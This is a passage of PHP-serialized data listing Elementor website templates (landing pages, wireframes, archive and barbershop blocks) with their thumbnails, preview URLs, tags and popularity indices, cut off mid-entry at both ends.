4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.4.jpg\";s:12:\"tmpl_created\";i:1528700326;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:34;s:16:\"popularity_index\";i:354;s:11:\"trend_index\";i:396;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:296;a:16:{s:4:\"tmpl\";i:1137;s:2:\"id\";i:16742;s:5:\"title\";s:31:\"Online Course &#8211; Education\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2021/01/Online-Course.png\";s:12:\"tmpl_created\";i:1610454122;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/online-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:55:\"[\"Academy\",\"Course Online\",\"Education\",\"Landing Pages\"]\";s:10:\"menu_order\";i:35;s:16:\"popularity_index\";i:777;s:11:\"trend_index\";i:776;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:297;a:16:{s:4:\"tmpl\";i:1440;s:2:\"id\";i:24563;s:5:\"title\";s:27:\"Wireframe &#8211; Contact 4\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-4.jpg\";s:12:\"tmpl_created\";i:1653989095;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:84:\"[\"Business\",\"Contact\",\"Footer\",\"Form\",\"Gallery\",\"Header\",\"Professional\",\"Subscribe\"]\";s:10:\"menu_order\";i:35;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:298;a:16:{s:4:\"tmpl\";i:688;s:2:\"id\";i:8981;s:5:\"title\";s:9:\"archive 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.5.jpg\";s:12:\"tmpl_created\";i:1528700484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:35;s:16:\"popularity_index\";i:333;s:11:\"trend_index\";i:195;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:299;a:16:{s:4:\"tmpl\";i:1162;s:2:\"id\";i:17284;s:5:\"title\";s:38:\"Dietitian &#8211; Health &amp; Fitness\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/01/Dietitian.png\";s:12:\"tmpl_created\";i:1610903484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/dietitian-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:39:\"[\"Fitness\",\"Health\",\"landscape design\"]\";s:10:\"menu_order\";i:36;s:16:\"popularity_index\";i:814;s:11:\"trend_index\";i:800;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:300;a:16:{s:4:\"tmpl\";i:1439;s:2:\"id\";i:24553;s:5:\"title\";s:27:\"Wireframe &#8211; Contact 3\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-3.jpg\";s:12:\"tmpl_created\";i:1653989057;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:67:\"[\"Business\",\"Contact\",\"Footer\",\"Form\",\"Professional\",\"Testimonial\"]\";s:10:\"menu_order\";i:36;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:301;a:16:{s:4:\"tmpl\";i:689;s:2:\"id\";i:8985;s:5:\"title\";s:9:\"archive 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.6.jpg\";s:12:\"tmpl_created\";i:1528700612;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:36;s:16:\"popularity_index\";i:204;s:11:\"trend_index\";i:95;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:302;a:16:{s:4:\"tmpl\";i:1144;s:2:\"id\";i:16897;s:5:\"title\";s:30:\"Personal Chef &#8211; Business\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2021/01/Personal-Chef.png\";s:12:\"tmpl_created\";i:1610466247;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/personal-chef-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:53:\"[\"Business\",\"Chef\",\"Food\",\"Landing Pages\",\"Services\"]\";s:10:\"menu_order\";i:37;s:16:\"popularity_index\";i:795;s:11:\"trend_index\";i:617;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:303;a:16:{s:4:\"tmpl\";i:1435;s:2:\"id\";i:24504;s:5:\"title\";s:28:\"Wireframe &#8211; Services 2\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-2.jpg\";s:12:\"tmpl_created\";i:1653988910;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/wireframe-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:80:\"[\"Business\",\"Contact\",\"Footer\",\"Header\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:37;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:304;a:16:{s:4:\"tmpl\";i:690;s:2:\"id\";i:8989;s:5:\"title\";s:9:\"archive 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.7.jpg\";s:12:\"tmpl_created\";i:1528701063;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:37;s:16:\"popularity_index\";i:208;s:11:\"trend_index\";i:111;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:305;a:16:{s:4:\"tmpl\";i:1147;s:2:\"id\";i:16946;s:5:\"title\";s:52:\"Online Full-Stack Developer Course &#8211; Education\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/01/Online-Full-Stack-Developer-Course.png\";s:12:\"tmpl_created\";i:1610532778;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/lp/online-full-stack-developer-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:76:\"[\"Academy\",\"Coding\",\"Course Online\",\"Developer\",\"Education\",\"Landing Pages\"]\";s:10:\"menu_order\";i:38;s:16:\"popularity_index\";i:805;s:11:\"trend_index\";i:0;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:306;a:16:{s:4:\"tmpl\";i:1437;s:2:\"id\";i:24528;s:5:\"title\";s:27:\"Wireframe &#8211; Contact 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-1.jpg\";s:12:\"tmpl_created\";i:1653988981;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:76:\"[\"Business\",\"Contact\",\"Footer\",\"Form\",\"Google Maps\",\"Header\",\"Professional\"]\";s:10:\"menu_order\";i:38;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:307;a:16:{s:4:\"tmpl\";i:691;s:2:\"id\";i:8996;s:5:\"title\";s:9:\"archive 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.8.jpg\";s:12:\"tmpl_created\";i:1528701290;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:38;s:16:\"popularity_index\";i:227;s:11:\"trend_index\";i:153;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:308;a:16:{s:4:\"tmpl\";i:1143;s:2:\"id\";i:16868;s:5:\"title\";s:40:\"Virtual Assistant &#8211; Online Service\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2021/01/Virtual-Assistant-250x280-1.png\";s:12:\"tmpl_created\";i:1610465656;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/virtual-assistant-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:46:\"[\"Assistant\",\"Landing Pages\",\"Online Service\"]\";s:10:\"menu_order\";i:39;s:16:\"popularity_index\";i:793;s:11:\"trend_index\";i:757;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:309;a:16:{s:4:\"tmpl\";i:692;s:2:\"id\";i:9001;s:5:\"title\";s:9:\"archive 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.9.jpg\";s:12:\"tmpl_created\";i:1528701433;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:39;s:16:\"popularity_index\";i:265;s:11:\"trend_index\";i:208;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:310;a:16:{s:4:\"tmpl\";i:1228;s:2:\"id\";i:21104;s:5:\"title\";s:26:\"Restaurant &#8211; Contact\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/12/11-Contact-Restaurant.jpg\";s:12:\"tmpl_created\";i:1638800146;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/restaurant-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:60:\"[\"Contact\",\"Food\",\"Form\",\"Google Maps\",\"Info\",\"Testimonial\"]\";s:10:\"menu_order\";i:39;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:311;a:16:{s:4:\"tmpl\";i:1140;s:2:\"id\";i:16812;s:5:\"title\";s:40:\"Construction Project &#8211; Real Estate\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/01/Construction-Project.png\";s:12:\"tmpl_created\";i:1610463582;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/construction-project-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:11:\"Real Estate\";s:4:\"tags\";s:59:\"[\"Construction\",\"Landing Pages\",\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:40;s:16:\"popularity_index\";i:796;s:11:\"trend_index\";i:724;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:312;a:16:{s:4:\"tmpl\";i:1244;s:2:\"id\";i:21393;s:5:\"title\";s:34:\"Interior Designer &#8211; Projects\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2021/12/big-22-Projects-Interior-Designer-New.jpeg\";s:12:\"tmpl_created\";i:1638823945;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/interior-designer-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:93:\"[\"Creative\",\"Creative Portfolio\",\"Design\",\"Designer\",\"Interior Design\",\"Portfolio\",\"Project\"]\";s:10:\"menu_order\";i:40;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:313;a:16:{s:4:\"tmpl\";i:997;s:2:\"id\";i:13528;s:5:\"title\";s:22:\"Barbershop &#8211; 404\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/05/404-Page.jpg\";s:12:\"tmpl_created\";i:1589893152;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/barbershop-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:34:\"[\"404\",\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:40;s:16:\"popularity_index\";i:768;s:11:\"trend_index\";i:681;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:314;a:16:{s:4:\"tmpl\";i:1148;s:2:\"id\";i:16960;s:5:\"title\";s:44:\"Dog &amp; Cat Food Delivery &#8211; Business\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2021/01/Dog-Food.png\";s:12:\"tmpl_created\";i:1610533581;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/lp/dog-cat-food-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:71:\"[\"Business\",\"Cat\",\"Delivery\",\"Dog\",\"Food\",\"Landing Pages\",\"Pet\",\"Pets\"]\";s:10:\"menu_order\";i:41;s:16:\"popularity_index\";i:782;s:11:\"trend_index\";i:510;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:315;a:16:{s:4:\"tmpl\";i:1251;s:2:\"id\";i:22143;s:5:\"title\";s:33:\"Fashion Store &#8211; Coming Soon\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Fashion-Store.png\";s:12:\"tmpl_created\";i:1647177389;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/fashion-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Coming Soon\",\"Fashion\",\"Landing Pages\",\"Shop\",\"store\"]\";s:10:\"menu_order\";i:41;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:316;a:16:{s:4:\"tmpl\";i:998;s:2:\"id\";i:13518;s:5:\"title\";s:26:\"Barbershop &#8211; Archive\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Blog-Page.jpg\";s:12:\"tmpl_created\";i:1589893157;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/barbershop-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:41;s:16:\"popularity_index\";i:737;s:11:\"trend_index\";i:523;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:317;a:16:{s:4:\"tmpl\";i:1155;s:2:\"id\";i:17095;s:5:\"title\";s:36:\"Mobile Pet Grooming &#8211; Business\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/01/Mobile-Pet-Grooming.png\";s:12:\"tmpl_created\";i:1610632115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/mobile-pet-grooming-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:38:\"[\"Dog\",\"Groom\",\"Landing Pages\",\"Pets\"]\";s:10:\"menu_order\";i:42;s:16:\"popularity_index\";i:786;s:11:\"trend_index\";i:731;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:318;a:16:{s:4:\"tmpl\";i:1241;s:2:\"id\";i:21451;s:5:\"title\";s:26:\"Exhibition &#8211; Gallery\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/12/21-Gallery-Exhibition.jpg\";s:12:\"tmpl_created\";i:1638821855;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/exhibition-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:74:\"[\"Art\",\"Creative\",\"Creative Portfolio\",\"Exhibition\",\"Gallery\",\"Portfolio\"]\";s:10:\"menu_order\";i:42;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:319;a:16:{s:4:\"tmpl\";i:996;s:2:\"id\";i:13604;s:5:\"title\";s:25:\"Barbershop &#8211; Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/05/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1589893147;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/barbershop-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:37:\"[\"Barber Shop\",\"Barbershop\",\"Footer\"]\";s:10:\"menu_order\";i:42;s:16:\"popularity_index\";i:555;s:11:\"trend_index\";i:267;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:320;a:16:{s:4:\"tmpl\";i:1159;s:2:\"id\";i:17245;s:5:\"title\";s:34:\"Marketing Course &#8211; Education\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2021/01/PPC.png\";s:12:\"tmpl_created\";i:1610902958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/marketing-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:45:\"[\"Course Online\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:43;s:16:\"popularity_index\";i:770;s:11:\"trend_index\";i:430;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:321;a:16:{s:4:\"tmpl\";i:1240;s:2:\"id\";i:21430;s:5:\"title\";s:30:\"Travel Blogger &#8211; Gallery\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/12/19-Gallery-Travel-Blogger.jpg\";s:12:\"tmpl_created\";i:1638821592;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/travel-blogger-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:43:\"[\"Gallery\",\"Photography\",\"Slider\",\"Travel\"]\";s:10:\"menu_order\";i:43;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:322;a:16:{s:4:\"tmpl\";i:995;s:2:\"id\";i:13612;s:5:\"title\";s:25:\"Barbershop &#8211; Header\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/06/barber-shop-header.jpg\";s:12:\"tmpl_created\";i:1589893142;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/barbershop-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:37:\"[\"Barber Shop\",\"Barbershop\",\"Header\"]\";s:10:\"menu_order\";i:43;s:16:\"popularity_index\";i:343;s:11:\"trend_index\";i:137;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:323;a:16:{s:4:\"tmpl\";i:1149;s:2:\"id\";i:16983;s:5:\"title\";s:41:\"Pilates Instructor &#8211; Online Service\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/01/Pilates-Instructor.png\";s:12:\"tmpl_created\";i:1610534138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/lp/pilates-instructor-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:70:\"[\"Free Trial\",\"Instructor\",\"Landing Pages\",\"Online Service\",\"Pilates\"]\";s:10:\"menu_order\";i:44;s:16:\"popularity_index\";i:778;s:11:\"trend_index\";i:412;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:324;a:16:{s:4:\"tmpl\";i:1416;s:2:\"id\";i:24104;s:5:\"title\";s:33:\"Ceramics Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Ceramics-Shop.jpg\";s:12:\"tmpl_created\";i:1650988949;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/ceramics-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:115:\"[\"Art\",\"Business\",\"Coming Soon\",\"Creative\",\"Decor\",\"Design\",\"Furniture Design\",\"Interior Design\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:44;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:325;a:16:{s:4:\"tmpl\";i:994;s:2:\"id\";i:13621;s:5:\"title\";s:30:\"Barbershop &#8211; Single Post\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/05/Single-Page.jpg\";s:12:\"tmpl_created\";i:1589893137;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/barbershop-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:44;s:16:\"popularity_index\";i:736;s:11:\"trend_index\";i:580;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:326;a:16:{s:4:\"tmpl\";i:1131;s:2:\"id\";i:16527;s:5:\"title\";s:24:\"Beauty Salon &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/12/404.jpg\";s:12:\"tmpl_created\";i:1608622517;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/beauty-salon-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:29:\"[\"404\",\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:742;s:11:\"trend_index\";i:563;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:327;a:16:{s:4:\"tmpl\";i:1412;s:2:\"id\";i:24033;s:5:\"title\";s:37:\"Dance Studio &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Dance-Studio.jpg\";s:12:\"tmpl_created\";i:1649881344;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/dance-studio-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:113:\"[\"Academy\",\"Business\",\"Dance Studio\",\"Form\",\"Pilates\",\"School\",\"Sport\",\"Teacher\",\"Training\",\"Under Construction\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:328;a:16:{s:4:\"tmpl\";i:1190;s:2:\"id\";i:18568;s:5:\"title\";s:32:\"Flower Delivery &#8211; Business\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/04/Flower-Delivery.png\";s:12:\"tmpl_created\";i:1617546716;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/flower-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:37:\"[\"Delivery\",\"Flower\",\"Landing Pages\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:874;s:11:\"trend_index\";i:763;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:329;a:16:{s:4:\"tmpl\";i:1130;s:2:\"id\";i:16535;s:5:\"title\";s:27:\"Beauty Salon &#8211; 